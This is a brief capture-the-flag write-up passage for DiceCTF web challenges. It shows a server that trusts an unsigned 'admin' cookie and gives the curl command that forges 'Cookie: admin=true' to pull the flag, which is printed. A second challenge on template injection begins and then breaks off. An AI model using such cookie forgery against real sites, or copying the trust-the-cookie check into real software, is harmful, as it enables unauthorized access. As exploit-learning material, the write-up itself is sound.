DiceCTF

Challenges [web]secure-page ... if admin == '': headers['set-cookie'] = 'admin=false' if admin == 'true': return (200, ''' <title>Secure Page</title> <link rel="stylesheet" href="/style.css" /> <div class="container"> <h1>Secure Page</h1> %s</div> ''' % os.environ.get('FLAG', 'flag is missing!'), headers) ... Just set Cookie: admin=true in the Header and send request. curl -H 'Cookie: admin=true' https://secure-page.mc.ax hope{signatures_signatures_signatures} [web]reverser Template Injection is likely to occur at the following. @app.post('/') def reverse(): ....